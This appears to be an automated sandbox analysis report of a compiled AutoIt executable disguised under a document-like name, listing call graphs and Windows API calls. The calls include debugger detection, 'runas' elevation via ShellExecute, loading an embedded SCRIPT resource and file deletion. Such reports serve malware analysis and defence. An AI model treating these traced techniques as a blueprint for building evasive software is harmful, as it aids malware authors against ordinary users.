102651->102652 102656 7c7667 59 API calls 102652->102656 102657 7c8047 59 API calls 102653->102657 102655 7c9837 84 API calls 102654->102655 102658 82cc76 102655->102658 102659 82cd5d 102656->102659 102660 82cc47 102657->102660 102662 7c8047 59 API calls 102658->102662 102663 7c7667 59 API calls 102659->102663 102661 7c7cab 59 API calls 102660->102661 102664 82cc51 102661->102664 102665 82cc82 102662->102665 102666 82cd66 102663->102666 102667 7c9837 84 API calls 102664->102667 102827 824a31 GetFileAttributesW 102665->102827 102669 7c9837 84 API calls 102666->102669 102670 82cc5d 102667->102670 102672 82cd73 102669->102672 102673 7c7b2e 59 API calls 102670->102673 102671 82cc8b 102674 82cc9e 102671->102674 102677 7c79f2 59 API calls 102671->102677 102675 7c459b 59 API calls 102672->102675 102673->102654 102676 7c9837 84 API calls 102674->102676 102684 82cca4 102674->102684 102678 82cd8e 102675->102678 102680 82cccb 102676->102680 102677->102674 102679 7c79f2 59 API calls 102678->102679 102681 82cd9d 102679->102681 102828 8237ef 75 API calls Mailbox 102680->102828 102683 82cdd1 102681->102683 102685 7c79f2 59 API calls 102681->102685 102686 7c8047 59 API calls 102683->102686 102684->102644 102687 82cdae 102685->102687 102688 82cddf 102686->102688 102687->102683 102690 7c7bcc 59 API calls 102687->102690 102689 7c7b2e 59 API calls 102688->102689 102691 82cded 102689->102691 102692 82cdc3 102690->102692 102693 7c7b2e 59 API calls 102691->102693 102694 7c7bcc 59 API calls 102692->102694 102694->102683 102869 82445a GetFileAttributesW 102709->102869 102712->102501 102713->102505 102714->102499 102715->102503 102716->102628 102826->102634 102827->102671 102828->102684 102870 823c3e 102869->102870 102871 824475 FindFirstFileW 102869->102871 102870->102505 102871->102870 102872 82448a FindClose 102871->102872 102872->102870 102874 7c818f 102873->102874 102877 7c81aa 102873->102877 102875 7c7e4f 59 API calls 102874->102875 102876 7c8197 CharUpperBuffW 102875->102876 
102876->102877 102877->102512 102879 7cf251 102878->102879 102880 7cf272 102879->102880 102913 829e4a 89 API calls 4 library calls 102879->102913 102880->102518 102883 7c838d 102882->102883 102884 7fedbd 102882->102884 102885 7e0db6 Mailbox 59 API calls 102883->102885 102886 7c8394 102885->102886 102887 7c83b5 102886->102887 102914 7c8634 59 API calls Mailbox 102886->102914 102887->102537 102887->102538 102889->102583 102890->102588 102891->102584 102892->102584 102893->102588 102894->102513 102895->102550 102896->102543 102897->102550 102898->102550 102899->102530 102900->102539 102901->102529 102902->102529 102903->102536 102904->102542 102905->102584 102906->102584 102907->102584 102908->102584 102909->102550 102910->102568 102911->102519 102912->102550 102913->102880 102914->102887 102916 7c7a5f 102915->102916 102917 7c7a85 _memmove 102915->102917 102916->102917 102918 7e0db6 Mailbox 59 API calls 102916->102918 102917->101443 102919 7c7ad4 102918->102919 102920 7e0db6 Mailbox 59 API calls 102919->102920 102920->102917 102921->101444 102922 7c1055 102927 7c2649 102922->102927 102925 7e2d40 __cinit 67 API calls 102926 7c1064 102925->102926 102928 7c7667 59 API calls 102927->102928 102929 7c26b7 102928->102929 102934 7c3582 102929->102934 102932 7c2754 102933 7c105a 102932->102933 102937 7c3416 59 API calls 2 library calls 102932->102937 102933->102925 102938 7c35b0 102934->102938 102937->102932 102939 7c35bd 102938->102939 102940 7c35a1 102938->102940 102939->102940 102941 7c35c4 RegOpenKeyExW 102939->102941 102940->102932 102941->102940 102942 7c35de RegQueryValueExW 102941->102942 102943 7c35ff 102942->102943 102944 7c3614 RegCloseKey 102942->102944 102943->102944 102944->102940 102945 7c1066 102950 7cf76f 102945->102950 102947 7c106c 102948 7e2d40 __cinit 67 API calls 102947->102948 102949 7c1076 102948->102949 102951 7cf790 102950->102951 102983 7dff03 102951->102983 102955 7cf7d7 102956 7c7667 59 API calls 102955->102956 102957 7cf7e1 102956->102957 102958 
7c7667 59 API calls 102957->102958 102959 7cf7eb 102958->102959 102960 7c7667 59 API calls 102959->102960 102961 7cf7f5 102960->102961 102962 7c7667 59 API calls 102961->102962 102963 7cf833 102962->102963 102964 7c7667 59 API calls 102963->102964 102965 7cf8fe 102964->102965 102993 7d5f87 102965->102993 102969 7cf930 102970 7c7667 59 API calls 102969->102970 102971 7cf93a 102970->102971 103021 7dfd9e 102971->103021 102973 7cf981 102974 7cf991 GetStdHandle 102973->102974 102975 7cf9dd 102974->102975 102976 8045ab 102974->102976 102977 7cf9e5 OleInitialize 102975->102977 102976->102975 102978 8045b4 102976->102978 102977->102947 103028 826b38 64 API calls Mailbox 102978->103028 102980 8045bb 103029 827207 CreateThread 102980->103029 102982 8045c7 CloseHandle 102982->102977 103030 7dffdc 102983->103030 102986 7dffdc 59 API calls 102987 7dff45 102986->102987 102988 7c7667 59 API calls 102987->102988 102989 7dff51 102988->102989 102990 7c7bcc 59 API calls 102989->102990 102991 7cf796 102990->102991 102992 7e0162 6 API calls 102991->102992 102992->102955 102994 7c7667 59 API calls 102993->102994 102995 7d5f97 102994->102995 102996 7c7667 59 API calls 102995->102996 102997 7d5f9f 102996->102997 103037 7d5a9d 102997->103037 103000 7d5a9d 59 API calls 103001 7d5faf 103000->103001 103002 7c7667 59 API calls 103001->103002 103003 7d5fba 103002->103003 103004 7e0db6 Mailbox 59 API calls 103003->103004 103005 7cf908 103004->103005 103006 7d60f9 103005->103006 103007 7d6107 103006->103007 103008 7c7667 59 API calls 103007->103008 103009 7d6112 103008->103009 103010 7c7667 59 API calls 103009->103010 103011 7d611d 103010->103011 103012 7c7667 59 API calls 103011->103012 103013 7d6128 103012->103013 103014 7c7667 59 API calls 103013->103014 103015 7d6133 103014->103015 103016 7d5a9d 59 API calls 103015->103016 103017 7d613e 103016->103017 103018 7e0db6 Mailbox 59 API calls 103017->103018 103019 7d6145 RegisterWindowMessageW 103018->103019 103019->102969 103022 7dfdae 
103021->103022 103023 81576f 103021->103023 103024 7e0db6 Mailbox 59 API calls 103022->103024 103040 829ae7 60 API calls 103023->103040 103026 7dfdb6 103024->103026 103026->102973 103027 81577a 103028->102980 103029->102982 103041 8271ed 65 API calls 103029->103041 103031 7c7667 59 API calls 103030->103031 103032 7dffe7 103031->103032 103033 7c7667 59 API calls 103032->103033 103034 7dffef 103033->103034 103035 7c7667 59 API calls 103034->103035 103036 7dff3b 103035->103036 103036->102986 103038 7c7667 59 API calls 103037->103038 103039 7d5aa5 103038->103039 103039->103000 103040->103027 103042 7c1016 103047 7c4974 103042->103047 103045 7e2d40 __cinit 67 API calls 103046 7c1025 103045->103046 103048 7e0db6 Mailbox 59 API calls 103047->103048 103049 7c497c 103048->103049 103050 7c101b 103049->103050 103054 7c4936 103049->103054 103050->103045 103055 7c493f 103054->103055 103056 7c4951 103054->103056 103057 7e2d40 __cinit 67 API calls 103055->103057 103058 7c49a0 103056->103058 103057->103056 103059 7c7667 59 API calls 103058->103059 103060 7c49b8 GetVersionExW 103059->103060 103061 7c7bcc 59 API calls 103060->103061 103062 7c49fb 103061->103062 103063 7c7d2c 59 API calls 103062->103063 103074 7c4a28 103062->103074 103064 7c4a1c 103063->103064 103065 7c7726 59 API calls 103064->103065 103065->103074 103066 7c4a93 GetCurrentProcess IsWow64Process 103067 7c4aac 103066->103067 103069 7c4b2b GetSystemInfo 103067->103069 103070 7c4ac2 103067->103070 103068 7fd864 103071 7c4af8 103069->103071 103082 7c4b37 103070->103082 103071->103050 103074->103066 103074->103068 103075 7c4b1f GetSystemInfo 103078 7c4ae9 103075->103078 103076 7c4ad4 103077 7c4b37 2 API calls 103076->103077 103079 7c4adc GetNativeSystemInfo 103077->103079 103078->103071 103080 7c4aef FreeLibrary 103078->103080 103079->103078 103080->103071 103083 7c4ad0 103082->103083 103084 7c4b40 LoadLibraryA 103082->103084 103083->103075 103083->103076 103084->103083 103085 7c4b51 GetProcAddress 103084->103085 
103085->103083 103086 7c3633 103087 7c366a 103086->103087 103088 7c36e5 103087->103088 103089 7c3688 103087->103089 103090 7c36e7 103087->103090 103093 7c36ca DefWindowProcW 103088->103093 103091 7c374b PostQuitMessage 103089->103091 103092 7c3695 103089->103092 103094 7c36ed 103090->103094 103095 7fd0cc 103090->103095 103099 7c36d8 103091->103099 103097 7fd154 103092->103097 103098 7c36a0 103092->103098 103093->103099 103100 7c3715 SetTimer RegisterWindowMessageW 103094->103100 103101 7c36f2 103094->103101 103135 7d1070 10 API calls Mailbox 103095->103135 103140 822527 71 API calls _memset 103097->103140 103103 7c36a8 103098->103103 103104 7c3755 103098->103104 103100->103099 103105 7c373e CreatePopupMenu 103100->103105 103107 7fd06f 103101->103107 103108 7c36f9 KillTimer 103101->103108 103102 7fd0f3 103136 7d1093 331 API calls Mailbox 103102->103136 103110 7fd139 103103->103110 103111 7c36b3 103103->103111 103133 7c44a0 64 API calls _memset 103104->103133 103105->103099 103114 7fd0a8 MoveWindow 103107->103114 103115 7fd074 103107->103115 103131 7c443a Shell_NotifyIconW _memset 103108->103131 103110->103093 103139 817c36 59 API calls Mailbox 103110->103139 103117 7c36be 103111->103117 103118 7fd124 103111->103118 103112 7fd166 103112->103093 103112->103099 103114->103099 103120 7fd078 103115->103120 103121 7fd097 SetFocus 103115->103121 103117->103093 103137 7c443a Shell_NotifyIconW _memset 103117->103137 103138 822d36 81 API calls _memset 103118->103138 103119 7c3764 103119->103099 103120->103117 103124 7fd081 103120->103124 103121->103099 103122 7c370c 103132 7c3114 DeleteObject DestroyWindow Mailbox 103122->103132 103134 7d1070 10 API calls Mailbox 103124->103134 103129 7fd118 103130 7c434a 68 API calls 103129->103130 103130->103088 103131->103122 103132->103099 103133->103119 103134->103099 103135->103102 103136->103117 103137->103129 103138->103119 103139->103088 103140->103112 103141 828d0d 103142 828d20 103141->103142 103143 828d1a 103141->103143 103145 
828d31 103142->103145 103146 7e2d55 _free 58 API calls 103142->103146 103144 7e2d55 _free 58 API calls 103143->103144 103144->103142 103147 7e2d55 _free 58 API calls 103145->103147 103148 828d43 103145->103148 103146->103145 103147->103148 103149 f74348 103163 f71f98 103149->103163 103151 f74413 103166 f74238 103151->103166 103169 f75438 GetPEB 103163->103169 103165 f72623 103165->103151 103167 f74241 Sleep 103166->103167 103168 f7424f 103167->103168 103170 f75462 103169->103170 103170->103165 103171 80416f 103175 815fe6 103171->103175 103173 80417a 103174 815fe6 85 API calls 103173->103174 103174->103173 103176 816020 103175->103176 103180 815ff3 103175->103180 103176->103173 103177 816022 103187 7c9328 84 API calls Mailbox 103177->103187 103178 816027 103181 7c9837 84 API calls 103178->103181 103180->103176 103180->103177 103180->103178 103184 81601a 103180->103184 103182 81602e 103181->103182 103183 7c7b2e 59 API calls 103182->103183 103183->103176 103186 7c95a0 59 API calls _wcsstr 103184->103186 103186->103176 103187->103178

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007C3B68
                                                        • IsDebuggerPresent.KERNEL32 ref: 007C3B7A
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,008852F8,008852E0,?,?), ref: 007C3BEB
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                          • Part of subcall function 007D092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007C3C14,008852F8,?,?,?), ref: 007D096E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007C3C6F
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00877770,00000010), ref: 007FD281
                                                        • SetCurrentDirectoryW.KERNEL32(?,008852F8,?,?,?), ref: 007FD2B9
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00874260,008852F8,?,?,?), ref: 007FD33F
                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 007FD346
                                                          • Part of subcall function 007C3A46: GetSysColorBrush.USER32(0000000F), ref: 007C3A50
                                                          • Part of subcall function 007C3A46: LoadCursorW.USER32(00000000,00007F00), ref: 007C3A5F
                                                          • Part of subcall function 007C3A46: LoadIconW.USER32(00000063), ref: 007C3A76
                                                          • Part of subcall function 007C3A46: LoadIconW.USER32(000000A4), ref: 007C3A88
                                                          • Part of subcall function 007C3A46: LoadIconW.USER32(000000A2), ref: 007C3A9A
                                                          • Part of subcall function 007C3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007C3AC0
                                                          • Part of subcall function 007C3A46: RegisterClassExW.USER32(?), ref: 007C3B16
                                                          • Part of subcall function 007C39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007C3A03
                                                          • Part of subcall function 007C39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007C3A24
                                                          • Part of subcall function 007C39D5: ShowWindow.USER32(00000000,?,?), ref: 007C3A38
                                                          • Part of subcall function 007C39D5: ShowWindow.USER32(00000000,?,?), ref: 007C3A41
                                                          • Part of subcall function 007C434A: _memset.LIBCMT ref: 007C4370
                                                          • Part of subcall function 007C434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007C4415
                                                        Strings
                                                        • runas, xrefs: 007FD33A
                                                        • This is a third-party compiled AutoIt script., xrefs: 007FD279
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                        • String ID: This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 529118366-3287110873
                                                        • Opcode ID: 15ea0927efc31b2278511faa0b15b9090dc490cc1b12d37772a4bdab00d6a610
                                                        • Instruction ID: 837888d9d1701e6eb96eaa1584603f97903f64c217ee5aebf304baca458e64e5
                                                        • Opcode Fuzzy Hash: 15ea0927efc31b2278511faa0b15b9090dc490cc1b12d37772a4bdab00d6a610
                                                        • Instruction Fuzzy Hash: 9B51BF31908148EADB25EBB8DC0AFFD7B79BF45750F00806DF525A22A2DF785A45CB21

                                                        Control-flow Graph

                                                        Control-flow graph for the function at 007C49A0 (basic blocks coloured executed / not executed in the original view); the node and edge listing is omitted. The APIs it reaches are listed below.
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 007C49CD
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • GetCurrentProcess.KERNEL32(?,0084FAEC,00000000,00000000,?), ref: 007C4A9A
                                                        • IsWow64Process.KERNEL32(00000000), ref: 007C4AA1
                                                        • GetNativeSystemInfo.KERNELBASE(00000000), ref: 007C4AE7
                                                        • FreeLibrary.KERNEL32(00000000), ref: 007C4AF2
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 007C4B23
                                                        • GetSystemInfo.KERNEL32(00000000), ref: 007C4B2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                        • String ID:
                                                        • API String ID: 1986165174-0
                                                        • Opcode ID: d826487ceb517c5a26bc393c80021a62675e1547927e9efdb4f7a5ed45f0bb2d
                                                        • Instruction ID: e59f4a58015ebea17721f9aa1447855271860badac2333667713624dfc974b29
                                                        • Opcode Fuzzy Hash: d826487ceb517c5a26bc393c80021a62675e1547927e9efdb4f7a5ed45f0bb2d
                                                        • Instruction Fuzzy Hash: A291C6319897C4DEC731DB788860AAEBFF5AF3A300B48495DD1C797B41D228A908D769

                                                        Control-flow Graph

                                                        Control-flow graph for the function at 007C4E89 (basic blocks coloured executed / not executed in the original view); the node and edge listing is omitted. The APIs it reaches are listed below.
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007C4D8E,?,?,00000000,00000000), ref: 007C4E99
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007C4D8E,?,?,00000000,00000000), ref: 007C4EB0
                                                        • LoadResource.KERNEL32(?,00000000,?,?,007C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007C4E2F), ref: 007FD937
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,007C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007C4E2F), ref: 007FD94C
                                                        • LockResource.KERNEL32(007C4D8E,?,?,007C4D8E,?,?,00000000,00000000,?,?,?,?,?,?,007C4E2F,00000000), ref: 007FD95F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 19ada50a1c8aaa3fba431a421ab4d29055bee01287630a105acad23f0bf34c5c
                                                        • Instruction ID: 0c5dd78026f0b3bbb8494321994b4df62c1ab171b1b95f9933db5db20b071868
                                                        • Opcode Fuzzy Hash: 19ada50a1c8aaa3fba431a421ab4d29055bee01287630a105acad23f0bf34c5c
                                                        • Instruction Fuzzy Hash: DE115A75240710BFD7218BA5EC48F677BBAFBC6B11F20426CF606C6250DBA1EC00CA60
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: be6a84454887b9bc91b586ff05d6b3bf69bde1e0431b15d98c0aee53882e9ced
                                                        • Instruction ID: cd5d6356901abf9c7829931e4a4d24fd4d8c1a9ac0293bea60d7d0725af6c33c
                                                        • Opcode Fuzzy Hash: be6a84454887b9bc91b586ff05d6b3bf69bde1e0431b15d98c0aee53882e9ced
                                                        • Instruction Fuzzy Hash: A7925770608341DFD760DF24C484B2ABBE1FB89304F14996DE98A9B362D779EC45CB92
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,007FE398), ref: 0082446A
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0082447B
                                                        • FindClose.KERNEL32(00000000), ref: 0082448B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 0a6ac38690f562f8cc1a4c044fde74186557d12eb336b55a375d641548f7d2a8
                                                        • Instruction ID: 1f8a3340975042db7f4567280d58b34eb5e25a5fd97f7007f4c6e65ebc5901cc
                                                        • Opcode Fuzzy Hash: 0a6ac38690f562f8cc1a4c044fde74186557d12eb336b55a375d641548f7d2a8
                                                        • Instruction Fuzzy Hash: 10E0D8364119246B42107B38FC0D4EA775CFE06335F10071AFA35D11D0F7B45940D5A9
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007D0A5B
                                                        • timeGetTime.WINMM ref: 007D0D16
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007D0E53
                                                        • Sleep.KERNEL32(0000000A), ref: 007D0E61
                                                        • LockWindowUpdate.USER32(00000000,?,?), ref: 007D0EFA
                                                        • DestroyWindow.USER32 ref: 007D0F06
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007D0F20
                                                        • Sleep.KERNEL32(0000000A,?,?), ref: 00804E83
                                                        • TranslateMessage.USER32(?), ref: 00805C60
                                                        • DispatchMessageW.USER32(?), ref: 00805C6E
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00805C82
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 4212290369-3242690629
                                                        • Opcode ID: 1eb5ca69e48a39d1ef53173eef5b75c91aac8a7adc5767cc5299508a1907539a
                                                        • Instruction ID: 7b3c446cd7b2e88e81e46fecb807cb59742a68620d6dc83c33e8f9e2ee94df5e
                                                        • Opcode Fuzzy Hash: 1eb5ca69e48a39d1ef53173eef5b75c91aac8a7adc5767cc5299508a1907539a
                                                        • Instruction Fuzzy Hash: 06B2AE70608741DFD764DB24C888BABB7E5FF84304F14491EE589D72A1DB79E884CBA2

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00828F5F: __time64.LIBCMT ref: 00828F69
                                                          • Part of subcall function 007C4EE5: _fseek.LIBCMT ref: 007C4EFD
                                                        • __wsplitpath.LIBCMT ref: 00829234
                                                          • Part of subcall function 007E40FB: __wsplitpath_helper.LIBCMT ref: 007E413B
                                                        • _wcscpy.LIBCMT ref: 00829247
                                                        • _wcscat.LIBCMT ref: 0082925A
                                                        • __wsplitpath.LIBCMT ref: 0082927F
                                                        • _wcscat.LIBCMT ref: 00829295
                                                        • _wcscat.LIBCMT ref: 008292A8
                                                          • Part of subcall function 00828FA5: _memmove.LIBCMT ref: 00828FDE
                                                          • Part of subcall function 00828FA5: _memmove.LIBCMT ref: 00828FED
                                                        • _wcscmp.LIBCMT ref: 008291EF
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829824
                                                          • Part of subcall function 00829734: _wcscmp.LIBCMT ref: 00829837
                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00829452
                                                        • _wcsncpy.LIBCMT ref: 008294C5
                                                        • DeleteFileW.KERNEL32(?,?), ref: 008294FB
                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00829511
                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00829522
                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00829534
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                        • String ID:
                                                        • API String ID: 1500180987-0
                                                        • Opcode ID: 25a102fa342bd81f8684983cd7bc6a0a44031708fefe68889324016f7e7692c6
                                                        • Instruction ID: 1d28ab68a73da858a77367865582571c775563b1ed40b08e5b1a6346cfcf5e20
                                                        • Opcode Fuzzy Hash: 25a102fa342bd81f8684983cd7bc6a0a44031708fefe68889324016f7e7692c6
                                                        • Instruction Fuzzy Hash: D2C13CB1E00229AADF11DF95DC85EDEBBBDFF49310F0040AAF609E6141DB349A848F65

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 007C4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008852F8,?,007C37AE,?), ref: 007C4724
                                                          • Part of subcall function 007E050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007C7165), ref: 007E052D
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007C71A8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007FE8C8
                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007FE909
                                                        • RegCloseKey.ADVAPI32(?), ref: 007FE947
                                                        • _wcscat.LIBCMT ref: 007FE9A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                        • String ID: Include$PP$Software\AutoIt v3\AutoIt$\$\Include\
